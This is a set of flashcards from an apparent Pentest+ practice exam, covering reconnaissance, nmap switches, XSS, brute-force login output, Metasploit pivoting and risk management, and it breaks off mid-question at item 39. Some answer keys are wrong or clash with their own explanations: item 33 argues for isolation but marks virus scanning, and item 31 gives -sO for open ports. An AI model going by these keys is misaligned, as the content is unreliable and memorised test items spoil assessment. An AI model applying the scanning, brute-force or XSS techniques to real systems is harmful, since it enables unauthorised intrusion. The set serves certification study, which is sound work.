Jason Dion's Pentest+ Course Practice Exam Flashcards

1
Q
A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the corporate office of the bank's dumpster. Based on this description, what portion of the penetration test is being conducted?
A.Information reporting
B.Vulnerability assessment
C.Passive information gathering
D.Active information gathering
A

C.Passive information gathering

Explanation

OBJ-2.1: Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. Instead, active information gathering starts to probe the organization using techniques like DNS Enumeration, Port Scanning, and OS Fingerprinting. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

2
Q

An analyst just completed a port scan and received the following results of open ports:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

TCP: 80
TCP: 110
TCP: 443
TCP: 1433
TCP: 3306
TCP: 3389

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on these scan results, which of the following services are NOT currently operating?
A.Database
B.SSH
C.RDP
D.Web
A

B.SSH

Explanation

OBJ-2.1: Based on the port numbers shown as open in the nmap scan results, SSH is not currently operating. SSH operates over port 22. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389.

3
Q
What programming language is most vulnerable to buffer overflow attacks?
A.Java
B.Swift
C.C++
D.Python
A

C.C++

Explanation
OBJ-3.4: Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon. Newer languages like Python, Java, and Swift do a better job of protecting against a buffer overflow, but even they are not perfect.

4
Q
A security analyst wants to implement a layered defense posture for this network, so he uses multiple antivirus defensive layers, including both an end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate?
A.Scanning attack
B.Social engineering attack
C.Forensic attack
D.ARP spoofing attack
A

B.Social engineering attack

Explanation

OBJ-3.1: By utilizing both endpoint protection (desktop antivirus software) and the email gateway scanner, the security analyst works to prevent phishing and other social engineering attacks. Emails are a common attack vector used in social engineering attacks.

5
Q
A pentester is trying to map the organization's internal network. The analyst enters the following command (nmap -n -sS -T4 -p 80 10.0.3.0/24). What type of scan is this?
A.Comprehensive Scan
B.Intense Scan
C.Quick Scan
D.Stealth Scan
A

D.Stealth Scan

Explanation:

OBJ-4.1: In nmap, the -sS flag signifies a stealth scan. This is also known as a SYN scan and is the most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network, and is not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections.

6
Q
When you are managing a risk, what is considered an acceptable option?
A.Mitigate it
B.Reject it
C.Initiate it
D.Deny it
A

A.Mitigate it

Explanation
OBJ-5.1: Mitigating a risk makes the effect of a risk a little less unpleasant, harmful, or serious. The majority of risk management is focused on mitigating risks down to an acceptable level of loss or risk.

7
Q

alert(“This site is vulnerable to an attack!”)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Then, you clicked the search button, and a pop-up box appeared on your screen showing the following text: "This site is vulnerable to an attack!" Based on this response, what vulnerability have you uncovered in the web application?

A.Distributed Denial of Service
B.Buffer Overflow
C.Cross-site scripting
D.Cross-site request forgery

A

C.Cross-site scripting

Explanation:
OBJ-3.4: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer.

8
Q
Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command?
A.nmap -Pn 10.0.0.0/25
B.nmap -Pn 10.0.0.0,1.0,2.0,3.0
C.nmap -Pn 10.0.0.-3.0
D.nmap -Pn 10.0.0.0/23
A

C.nmap -Pn 10.0.0.-3.0

Explanation

OBJ-4.1: The simplest way to scan multiple adjacent subnets is to use a range in the target specification. The -Pn option tells nmap to conduct a host-only scan of every IP in this target space. Using the dash (-) in the IP address means to scan "this network through this network." So, 10.0.0-3.0 will scan every IP from 10.0.0.0 through 10.0.3.255.

9
Q

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?
A.Conducting a brute force login attempt of a remote service of 192.168.1.142
B.Conducting a brute force login attempt of a remote service on 192.168.1.142
C.Conducting a ping sweep of 192.168.1.142/24
D.Conducting a Denial of Service attack on 192.168.1.142

A

B.Conducting a brute force login attempt of a remote service on 192.168.1.142

Explanation

OBJ-2.4: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

10
Q
A security analyst conducted an nmap scan of a server and found that port 25 is open. What risk might this server be exposed to?
A.Web portal data leak
B.Clear text authentication
C.Open file/print sharing
D.Open mail relay
A

D.Open mail relay

Explanation:
OBJ-3.2: Port 25 is the default port for SMTP (Simple Message Transfer Protocol), which is used for sending an email. An active mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).

11
Q
What nmap switch would you use to perform operating system detection?
A.-OS
B.-sP
C.-O
D.-s0
A

C.-O

Explanation:
OBJ-4.1: The -O switch is used to tell nmap to conduct fingerprinting of the operating system based on the responses received during scanning. Nmap will then report on the suspected operating system of the scanned host. If you use -O -v, you will get additional details, as this runs the operating system scan in verbose mode. The -OS flag is made up and not supported by nmap. The -s0 flag conducts an IP protocol scan of the target. The -sP flag conducts a simple ping scan against the target.

12
Q
An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building's main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?
A.Shoulder surfing
B.Mantrap
C.Tailgating
D.Social engineering
A

C.Tailgating

Explanation

OBJ-3.6: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder.

13
Q
What command could be used to list the active services from the Windows command prompt?
A. sc query \\servername
B.sc config
C.sc query
D.sc query type= running
A

C.sc query

Explanation

OBJ-2.1: Windows uses sc query to display information about running services. It is part of the Service Control command-line tool, known as sc. The sc config command will modify the value of a service's entries in the registry and the Service Control Manager database. The sc query command will obtain and display information about the specified service, driver, type of service, or driver type. By entering just sc query, the command will return information on the active services only. By using the type= running option, only information on the running services will be displayed. If the command sc query \\servername is used, then the remote server's (\\servername) active services will be displayed.

14
Q
A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation?
A.Rules of engagement 
B.Memorandum of understanding
C.Service level agreement
D.Acceptable Use Policy
A

A.Rules of engagement

Explanation

OBJ-1.1: While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.

15
Q

You are logged into the Windows command prompt and want to find what systems are alive in a portion of a Class B network (172.16.0.0/24) using ICMP. What command would best accomplish this?
A. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I “REPLY”
B.ping 172.16.0.255
C. for %X in (1 1 255) do PING 172.16.0.%X
D.Ping 172.16.0.0

A

A. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I “REPLY”

Explanation:
OBJ-4.4: The Windows command line does support some fundamental scripting, as shown in this answer. Use an iterative variable to set the starting value (start#) and then step through a set range of values until the value exceeds the set ending value (end#). /L executes the iteration by comparing start# with end#. If start# is less than end#, the command will execute. When the iterative variable exceeds end#, the command shell exits the loop. You can also use a negative step# to step through a range in decreasing values. For example, (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence 5 4 3 2 1. The syntax is: "for /L %variable in (start# step# end#) do command [CommandLineOptions]."

16
Q
What must be developed to show security improvements over time?
A.Reports
B.Testing Tools
C.Taxonomy of vulnerabilities
D.Metrics
A

D.Metrics

Explanation:
OBJ-5.1: Metrics are a method of measuring something over time. If you wish to show the effect of security improvements over time, creating metrics would be a good option. For example, you may wish to look at the number of unpatched and known vulnerabilities. As this number decreases, your network would be considered to have improved security. Reports and testing tools alone cannot show progress. You must have measurable results using metrics.

17
Q

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization’s LAN. What is the best method for the penetration tester to use to conduct the pivot?
A.Create a route statement in meterpreter
B.Set the payload to propagate through meterpreter
C.Issue the pivot exploit and setup meterpreter
D.Reconfigure the network settings in meterpreter

A

A.Create a route statement in meterpreter

Explanation:
OBJ-3.7: Since the penetration tester has exploited the FTP server from outside the LAN, they will need to set up a route statement in meterpreter. Metasploit makes this very simple since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) and then create the routes needed.

18
Q

What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A.A stealth scan that scans all open ports excluding ports 80 to 443
B.A stealth scan that scans ports 80 and 443
C.A stealth scan that scans all ports from 80 to 443 and determines a target's operating system
D.A stealth scan that scans ports 80 to 443

A

C.A stealth scan that scans all ports from 80 to 443 and determines a target's operating system

Explanation:
OBJ-4.1: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.

19
Q
What is a formal document that states what will and will not be performed during a penetration test?
A.NDA
B.MSA
C.Corporate Policy
D.SOW
A

D.SOW

Explanation:
OBJ-1.2: The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the size and scope of the assessment and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scopes for each one. A non-disclosure agreement (NDA) is a legal contract between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share for certain purposes but wish to restrict access. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

20
Q
A hacker successfully modified the sale price of items purchased through your company's web site. During the investigation that followed, the security analyst verified that neither the web server nor the Oracle database was compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items' sale price?
A.Changing hidden form values
B.Cross-site scripting
C.SQL injection
D.Buffer overflow attack
A

A.Changing hidden form values

Explanation:
OBJ-3.4: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items’ price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

21
Q
What kind of attack is an example of IP spoofing?
A.ARP Poisoning
B.SQL Injections
C.Man-in-the-Middle
D.Cross-site scripting
A

C.Man-in-the-Middle

Explanation:
OBJ-3.2: The man-in-the-middle attack intercepts communications between two systems. For example, in an HTTP transaction, the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server. This often uses IP spoofing to trick a victim into connecting to the attacker. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. ARP Poisoning, also known as ARP Spoofing, is a type of cyber attack carried out over a Local Area Network (LAN) that involves sending malicious ARP packets to a default gateway on a LAN to change the pairings in its IP to MAC address table. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.

22
Q

Which of the following is true concerning LM hashes?
A.LM hashes consist of 48 hexadecimal characters
B.LM Hashes are based on the AES128 cryptographic standard
C.LM Hashes are not generated when the password length exceeds 15 characters
D.Uppercase characters in the password are converted to lowercase

A

C.LM Hashes are not generated when the password length exceeds 15 characters

Explanation:
OBJ-3.4: LM hash, also known as LanMan hash or LAN Manager hash, is a compromised password hashing function. This was the primary hash that Microsoft LAN Manager and Microsoft Windows versions before Windows NT used to store user passwords. Support for the legacy LAN Manager protocol continued in later versions of Windows for backward compatibility. Still, it was recommended by Microsoft to be turned off by administrators due to the LM hash’s weak strength. LM hashes are not generated when the password length exceeds 15 characters since it is stored as a 16-byte value.

23
Q
What is not one of the three categories of solutions that all of the pentester's recommended mitigations should fall into?
A.Technology
B.Problems
C.People
D.Process
A

B.Problems

Explanation:
OBJ-5.3: All possible solutions can be categorized as People, Process, or Technology solutions.

24
Q
An attacker was able to gain access to your organization's network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network. What attack should he use?
A.Smurf
B.MAC Flood
C.Fraggle
D.Tear Drop
A

B.MAC Flood

Explanation:
OBJ-3.2: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forces legitimate MAC addresses out of the switch's MAC address table and forces a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch's table is flooded with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router's broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address.

25
Q
What type of assessment seeks to validate a system's security posture against a particular checklist?
A.Compliance-based
B.Objective-based
C.Red team
D.Goal-based
A

A.Compliance-based

Explanation:
OBJ-1.3: Compliance-based assessments seek to validate a system against a given checklist. This could validate organizational policies, be risk-based, or be used to validate PCI-DSS compliance. Objective-based penetration testing approaches an objective from all angles to ensure that information remains secure. This testing more accurately simulates the attacks launched by a malicious party. Goal-based assessments use goals defined before the assessment begins, and the penetration tester works to achieve the goals. Once a goal is achieved, the penetration testers should determine how many unique ways the goal can be achieved. A red team is a group that helps organizations to improve themselves by providing opposition to the point of view of the organization that they are helping.

26
Q
What tool can be used to scan a network to perform vulnerability checks and compliance auditing?
A.Nessus
B.NMAP
C.Metasploit
D.BeEF
A

A.Nessus

Explanation:
OBJ-4.2: Nessus is a popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

27
Q
What term describes the amount of risk an organization is willing to accept?
A.Risk avoidance
B.Risk acceptance
C.Risk appetite
D.Risk mitigations
A

C.Risk appetite

Explanation:
OBJ-5.1: Risk appetite describes how much risk an organization is willing to accept. This is a crucial factor both in designing the assessment and determining the recommended mitigations. Risk mitigation is a strategy to prepare for and lessen the effects of threats faced by a data center. Risk mitigation refers to applying security controls to reduce the risk of a known vulnerability. Risk avoidance is the elimination of hazards, activities, and exposures that can negatively affect an organization’s assets. Risk acceptance is the act of accepting the identified risk and not taking additional actions to reduce the risk because the risk is low enough. Risk acceptance should only be done once an organization’s risk tolerance is defined and communicated amongst the decision-makers.

28
Q
An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker was able to locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?
A.Nessus scripting engine
B.Cain and Abel
C.CUPP
D.Netcat
A

B.Cain and Abel

Explanation:
OBJ-4.2: Cain and Abel is a popular password cracking tool. It can recover many password types using methods such as network packet sniffing and cracking various password hashes by using dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.
29
Q

A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1

HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix)   (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: "1986-69b-123a4bc6"
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of action did the analyst perform, based on the command and response above?
A.SQL Injection
B.Querying the Whois database
C.Banner grabbing
D.Cross-site scripting
A

C.Banner grabbing

Explanation:
OBJ-2.1: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command "nc test.diontraining.com 80" was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, it reveals the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the operating system of the server.

30
Q

A vulnerability scan has returned the following results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Detailed Results
10.56.17.21 (APACHE-2.4)

Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified - 8.30.2017

Enumeration Results:
print$ c:\windows\system32\spool\drivers
files c:\FileShare\Accounting
Temp c:\temp

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What best describes the meaning of this output?
A.Windows Defender has a known exploit that must be resolved or patched
B.There is no CVE present, so this is a false positive caused by Apache running on a Windows server
C.Connecting to the host using a null session allows enumeration of the share names on the host
D.There is an unknown bug in an Apache server with no Bugtraq ID

A

C.Connecting to the host using a null session allows enumeration of the share names on the host

Explanation:
OBJ-2.2: These results from the vulnerability scan show an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.

31
Q
What nmap switch would a hacker use to attempt to see which ports are open on a targeted network?
A.-sU
B.-sO
C.-sS
D.-sP
A

B.-sO

Explanation:
OBJ-4.1: In nmap, the -sO flag is used to determine which IP protocols (TCP, UDP, ICMP, IGMP, etc.) are supported and open on the targeted machine, making it the correct answer. The -sU flag will only scan UDP ports. The -sS flag will only scan TCP ports using a SYN scan. The -sP flag is a legacy (and deprecated) command for a ping scan.

32
Q

What should be done NEXT if the final set of security controls does not eliminate all of the risks in a given system?
A.You should accept the risk if the residual risk is low enough
B.You should remove the current controls since they are not completely effective
C.You should continue to apply additional controls until there is zero risk
D.You should ignore any remaining risk

A

A.You should accept the risk if the residual risk is low enough

Explanation:
OBJ-1.3: In most cases, you will be unable to remove all risk. Instead, it would be best to mitigate the risk to a low enough level to accept the residual risk. Removing the controls would add to the risk, which is a bad course of action to select. Ignoring the remaining risk is unacceptable; instead, you should acknowledge what risk remains and accept it if it is low enough. If it is not low enough, you should continue to mitigate the risk by adding additional control measures. It is unlikely you will ever be able to get all risk down to zero, but mitigating to a lower level and then accepting the residual risk is a common industry practice.

33
Q

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store’s IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions?

A.These devices should be isolated from the rest of the enterprise network
B.These devices should be scanned for viruses before installation
C.There are no new risks due to the install and the company has a stronger physical security posture
D.These devices are insecure and should be isolated from the internet

A

B.These devices should be scanned for viruses before installation

Explanation:
OBJ-1.3: While the physical security posture of the company has definitely been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store’s network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don’t necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network and install the video cameras, alarms, and locks on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn’t protect them long-term.

34
Q
What is a common Service Oriented Architecture Protocol (SOAP) vulnerability?
A.XML denial of service issue
B.SQL Injection
C.XPath injection
D.Cross-site scripting
A

A.XML denial of service issue

Explanation:
OBJ-1.1: An XML denial of service (or XML bomb) attempts to pull in entities recursively in a defined DTD and explode the amount of memory used by the system until a denial of service condition occurs. Service-Oriented Architecture (SOA) is an architectural paradigm, and it aims to achieve a loose coupling amongst interacting distributed systems. SOA is used by enterprises to efficiently and cost-effectively integrate heterogeneous systems. However, SOA is affected by several security vulnerabilities, affecting the speed of its deployment in organizations. SOA is most commonly vulnerable to an XML denial of service. While the other options could be used as part of an attack on SOAP, the SOAP message itself is formatted as an XML document making an XML denial of service the most common vulnerability. While SOAP requests are vulnerable to SQL injections, this occurs by submitting a parameter as a morphed SQL query that can authenticate or reveal sensitive information as an attack on the underlying SQL. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XPath Injections operate on web sites that use user-supplied information to construct an XPath query for XML data.

35
Q

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over their nmap scan results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Starting NMAP 7.60 at 2020-06-12 21:23:15

NMAP scan report for 192.168.1.45
Host is up (0.78s latency).
Not shown: 992 closed ports

PORT  STATE  SERVICE
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
515/tcp open
631/tcp open ipp
9100/tcp open

MAC Address: 00:0C:29:18:6B:DB

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following operating systems is most likely used by the host?
A.Windows workstation
B.Linux server
C.Networked printer
D.Windows server
A

C.Networked printer

Explanation:
OBJ-4.1: Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP for most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, and 445 are found, this is usually a good indication of a Windows file server. Ports such as FTP, telnet, SMTP, and HTTP are used by both Windows and Linux servers; therefore, they are not as helpful in indicating which operating system is in use by the host.

36
Q

An organization is currently accepting bids for a contract that will involve penetration testing and reporting. The organization is asking all bidders to provide proof of previous penetration testing and reporting experience. One contractor decides to print out a few reports from some previous penetration tests that they performed. What could have occurred as a result of this contractor’s actions?
A.The company accepting the bids will hire the contractor because of the quality of the reports he submitted with his bid
B.The contractor may have inadvertently exposed numerous vulnerabilities they had found at other companies on previous assessments
C.The contractor will have their bid accepted with a special pay bonus because of their excellent work on previous penetration tests
D.The organization accepting the bids will want to use the reports as an example of the format for all bidders to use in the future

A

B.The contractor may have inadvertently exposed numerous vulnerabilities they had found at other companies on previous assessments

Explanation:
OBJ-1.2: Pentesters should never disclose any information from previous penetration tests to anyone outside of the assessed organization, per the original contract and scope of work. If the contractor wishes to provide a sample report, then the report should be created specifically for the contract and only include information from a sample/test network, not a previous customer’s assessment. This could also be in breach of the NDA between the pentester and the organization, as well.

37
Q

\b[A-Za-z0-9_%+-]+@[A-Za-z0-9.-]+.[A-Za-z]{2,6}\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following strings would be included in the output of the search?
A.jason_dion@dion.training
B.support@diontraining.com
C.jason.dion@diontraining.com
D.www.diontraining.com

A

B.support@diontraining.com

Explanation:
OBJ-4.4: In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9_%+-]) is composed of upper or lower case alphanumeric characters and the symbols “_%+-”. After the first part of the word and the at sign (@) are specified, there follows another word ([A-Za-z0-9.-]), a period (.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of something@something.com (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of www.diontraining.com is wrong because it does not have an @ sign in the string. The option of jason.dion@diontraining.com is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + - ). The option of jason_dion@dion.training is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.

38
Q

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?

A.Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
B.Permit 143.27.43.32 161.212.71.14 RDP 3389
C.Permit 143.27.43.0/24 161.212.71.14 RDP 3389
D.Permit 143.27.43.32 161.212.71.0/24 RDP 3389

A

B.Permit 143.27.43.32 161.212.71.14 RDP 3389

Explanation:
OBJ-5.3: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” would be correct.

39
Q

A security engineer is using the Kali Linux operating system and is writing exploits in C++. What command should they use to compile their new exploit and name it notepad.exe?

A.g++ -i exploit.pl -o notepad.exe
B.g++ --compile -i exploit.cpp -p notepad.exe
